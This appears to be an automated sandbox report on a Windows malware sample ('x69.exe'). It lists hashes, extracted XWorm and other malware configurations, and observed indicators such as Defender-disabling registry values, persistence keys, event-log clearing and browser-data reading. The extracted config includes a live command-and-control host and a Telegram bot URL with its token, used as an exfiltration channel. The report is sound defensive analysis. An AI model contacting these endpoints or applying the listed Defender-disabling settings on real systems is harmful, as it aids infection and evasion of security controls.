Resubmissions
22/05/2025, 12:12  250522-pc961stjt7  10
22/05/2025, 12:11  250522-pcnysatjt2  10
20/05/2025, 04:12  250520-eskwysbl9t  10
Analysis
max time kernel: 870s
max time network: 870s
platform: windows10-ltsc_2021_x64
resource: win10ltsc2021-20250425-en
resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250425-en, locale:en-us, os:windows10-ltsc_2021-x64, system
submitted: 20/05/2025, 04:12
Static task
static1
Behavioral task
behavioral1
Sample
x69.exe
Resource
win10v2004-20250502-en
General
Target: x69.exe
Size: 285KB
MD5: 20841606ce69632f258221219aeee09b
SHA1: b72918797186774598792c47b66d5857be59f576
SHA256: 1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
SHA512: aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e
SSDEEP: 6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI
Malware Config
Extracted: xworm
Version: 3.1
grayhatgroupontop.zapto.org:1177
Install_directory: %AppData%
install_file: USB.exe
telegram: https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004
Extracted: bdaejec
ddos.dnsnb8.net
Extracted: gurcu
https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004
Extracted: latentbot
grayhatgroupontop.zapto.org
Signatures
Bdaejec family
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule
behavioral2/files/0x00070000000281d0-84.dat disable_win_def
Detect Xworm Payload 2 IoCs
resource yara_rule
behavioral2/files/0x00080000000281c7-25.dat family_xworm
behavioral2/memory/3640-37-0x0000000000910000-0x0000000000928000-memory.dmp family_xworm
Detects Bdaejec Backdoor. 5 IoCs
Bdaejec is a backdoor written in C++.
resource yara_rule
behavioral2/memory/1368-150-0x0000000000FB0000-0x0000000000FB9000-memory.dmp family_bdaejec_backdoor
behavioral2/memory/4008-680-0x0000000000E70000-0x0000000000E79000-memory.dmp family_bdaejec_backdoor
behavioral2/memory/1368-835-0x0000000000FB0000-0x0000000000FB9000-memory.dmp family_bdaejec_backdoor
behavioral2/memory/4008-3010-0x0000000000E70000-0x0000000000E79000-memory.dmp family_bdaejec_backdoor
behavioral2/memory/1368-3104-0x0000000000FB0000-0x0000000000FB9000-memory.dmp family_bdaejec_backdoor
Gurcu family
Latentbot family
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe
Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe
Modifies security service 2 TTPs 2 IoCs
description ioc Process
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target
PID 5464 created 612 5464 powershell.EXE 5
PID 4284 created 612 4284 powershell.EXE 5
Xworm family
pid Process 6340 powershell.exe 6664 powershell.exe 568 powershell.exe 6608 powershell.exe 1784 powershell.exe 1760 powershell.exe 6224 powershell.exe 7120 powershell.exe 1984 powershell.exe 1440 powershell.exe 1844 powershell.exe 2400 powershell.exe 2092 powershell.exe 1252 powershell.exe 4284 powershell.EXE 376 powershell.exe 556 powershell.exe 5680 powershell.exe 5072 powershell.exe 232 powershell.exe 5300 powershell.exe 4124 powershell.exe 4896 powershell.exe 3124 powershell.exe 5928 powershell.exe 4164 powershell.exe 524 powershell.exe 2140 powershell.exe 5060 powershell.exe 5160 powershell.exe 7136 powershell.exe 5548 powershell.exe 6668 powershell.exe 1656 powershell.exe 6712 powershell.exe 4456 powershell.exe 5416 powershell.exe 5464 powershell.EXE 5472 powershell.exe 5252 powershell.exe 5712 powershell.exe 5872 powershell.exe 2692 powershell.exe 2492 powershell.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process
6808 netsh.exe
4492 netsh.exe
resource yara_rule
behavioral2/files/0x00070000000281cc-73.dat aspack_v212_v242
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe
Checks computer location settings 2 TTPs 8 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description ioc Process
Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation x69.exe
Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe
Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe
Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation x69.exe
Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation firefox.exe
Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation firefox.exe
Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation izTLZKj.exe
Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation iyMbXS.exe
Drops startup file 2 IoCs
description ioc Process
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe
Executes dropped EXE 35 IoCs
pid Process
3640 x69.exe
1332 x69.exe
3192 x69Disable-winDefender.exe
2368 x69Disable-winDefender.exe
4008 izTLZKj.exe
1568 x69install.exe
1368 iyMbXS.exe
1140 x69install.exe
4676 firefox.exe
3188 firefox.exe
2312 firefox.exe
3900 firefox.exe
5628 firefox.exe
6048 firefox.exe
4800 firefox.exe
6348 firefox.exe
6692 firefox.exe
6704 firefox.exe
6728 firefox.exe
4324 x69.exe
6744 firefox.exe
3288 tcpview64.exe
5756 x69.exe
6972 x69.exe
7064 x69.exe
1816 x69.exe
3192 x69.exe
1052 x69.exe
2860 x69.exe
5684 x69.exe
460 x69.exe
4768 x69.exe
6076 x69.exe
5512 x69.exe
2584 x69.exe
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx svchost.exe
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx svchost.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" x69.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe
Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" x69.exe
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA firefox.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc
14 ip-api.com
Modifies Security services 2 TTPs 8 IoCs
Modifies the startup behavior of a security service.
description ioc Process
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe
Drops file in System32 directory 13 IoCs
description ioc Process
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target
PID 5464 set thread context of 420 5464 powershell.EXE 248
PID 4284 set thread context of 5312 4284 powershell.EXE 249
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseAPToast.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE iyMbXS.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseAP.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\java.exe izTLZKj.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\keytool.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe izTLZKj.exe File opened for modification C:\Program Files\7-Zip\7z.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\pack200.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe iyMbXS.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstat.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoia.exe iyMbXS.exe File opened for modification C:\Program 
Files\Windows Defender\ConfigSecurityPolicy.exe iyMbXS.exe File opened for modification C:\Program Files\Windows Defender\NisSrv.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jps.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe izTLZKj.exe File opened for modification C:\Program Files\Mozilla Firefox\nmhproxy.exe iyMbXS.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaw.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaws.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe izTLZKj.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\java.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jjs.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\orbd.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdeps.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe iyMbXS.exe File opened for modification C:\Program 
Files\Java\jre-1.8\bin\rmiregistry.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\misc.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe izTLZKj.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe izTLZKj.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdb.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE izTLZKj.exe File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\disabledupdater.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\ktab.exe iyMbXS.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\os_update_handler.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javah.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft 
Office\root\Office16\ONENOTEM.EXE iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE izTLZKj.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseImdsCollector.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe izTLZKj.exe -
Drops file in Windows directory 1 IoCs
description ioc Process
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language izTLZKj.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iyMbXS.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 tcpview64.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz tcpview64.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe
Modifies Control Panel 1 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\Colors firefox.exe
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 45 IoCs
NTFS ADS 1 IoCs
description   ioc                                                    Process
File created  C:\Users\Admin\Downloads\TCPView.zip:Zone.Identifier  firefox.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
568   schtasks.exe
932   schtasks.exe
4796  schtasks.exe
2392  schtasks.exe
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid   Process
3640  x69.exe
3664  Explorer.EXE
3664  Explorer.EXE
